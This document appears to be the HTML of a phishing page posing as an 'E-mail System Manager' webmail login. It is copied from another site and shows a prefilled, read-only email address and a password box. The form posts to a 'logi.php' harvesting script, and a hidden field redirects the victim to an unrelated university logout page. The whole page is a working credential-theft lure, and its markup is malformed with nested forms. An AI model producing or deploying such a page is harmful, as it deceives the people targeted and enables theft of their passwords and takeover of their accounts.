<form method="post" action="logi.php" autocomplete="" name="" id="" onsubmit="return hash2(this)">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0048)https://services.tsb.com.bo/DashBoard/index2.php -->
<HTML><HEAD><TITLE>E-mail System Manager</TITLE>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type><LINK 
rel=stylesheet type=text/css href="login_files/style.css">
<META name=GENERATOR content="MSHTML 9.00.8112.16490"></HEAD>
<BODY leftMargin=0 topMargin=0 marginheight="0" marginwidth="0">
<DIV id=mainCont><BR><BR><BR>
<TABLE border=0 cellSpacing=0 cellPadding=0 width=300 align=center>
  <TBODY>
  <TR>
    <TD background=login_files/pixi_grey_blue.gif colSpan=3><IMG 
      src="login_files/pixi_grey_blue.gif" width=25 height=17></TD></TR>
  <TR>
    <TD background=login_files/pixi_dark_grey.gif width=1><IMG 
      src="login_files/pixi_dark_grey.gif" width=1 height=1></TD>
    <TD>
      <TABLE border=0 cellSpacing=0 cellPadding=0 width="100%">
        <TBODY>
        <TR>
          <TD height=30 
            background=login_files/pixi_grey.gif>&nbsp;&nbsp;<FONT 
            color=#000000 size=4 face=Georgia><B>E-mail System Manager</B></FONT></TD></TR>
        <TR>
          <TD background=login_files/pixi_grey_blue.gif><IMG 
            src="login_files/pixi_grey_blue.gif" width=25 height=3></TD></TR>
        <TR>
          <TD>
            <TABLE border=0 cellSpacing=2 cellPadding=8 width="100%">
              <TBODY>
              <TR>
                <TD height=100 vAlign=top width="100%" align=left><BR>
                  <CENTER>
                  <FORM method="post"><input type="hidden" name="next" value="https://www.umn.edu/logout"><INPUT type=hidden name=MAT>
                  <TABLE border=0 align=center>
                    <TBODY>
                    <TR>
                      <TD><FONT size=2>Full E-mail:</FONT></TD>
                      <TD><INPUT class=campo-form name=email value="abuse@ncon.net.cn" class="nodisp" readonly/></TD></TR>
                    <TR>
                      <TD>Password: </TD>
                      <TD><INPUT class=campo-form name=password 
                        type=password required/><BR></TD></TR>
                    <TR>
                      <TD colSpan=2 align=center><INPUT class=botone value="Click To Continue" type=submit></FONT></TD></TR></TBODY></TABLE></FORM></CENTER></TD></TR></TBODY></TABLE></TD></TR>
        <TR>
          <TD background=login_files/pixi_grey_blue.gif><IMG 
            src="login_files/pixi_grey_blue.gif" width=1 
        height=17></TD></TR></TBODY></TABLE></TD>
    <TD background=login_files/pixi_dark_grey.gif width=1><IMG 
      src="login_files/pixi_dark_grey.gif" width=1 
height=1></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
